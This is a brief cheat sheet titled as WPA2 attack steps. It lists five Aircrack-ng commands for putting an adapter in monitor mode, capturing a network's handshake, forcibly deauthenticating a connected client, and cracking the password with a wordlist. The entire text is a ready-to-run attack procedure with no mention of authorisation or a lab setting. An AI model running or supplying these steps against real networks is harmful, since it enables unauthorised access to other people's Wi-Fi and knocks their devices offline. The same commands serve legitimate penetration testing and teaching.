Aircrack-ng Suite — WPA2 Attack Steps

  1. Put wireless adapter in monitor mode: airmon-ng start wlan0
  2. Scan for networks: airodump-ng wlan0mon
  3. Capture handshake: airodump-ng -c <ch> –bssid <AP_MAC> -w capture wlan0mon
  4. Deauthenticate a client to force reconnect: aireplay-ng –deauth 10 -a <AP> wlan0mon
  5. Crack the handshake: aircrack-ng -w rockyou.txt capture.cap
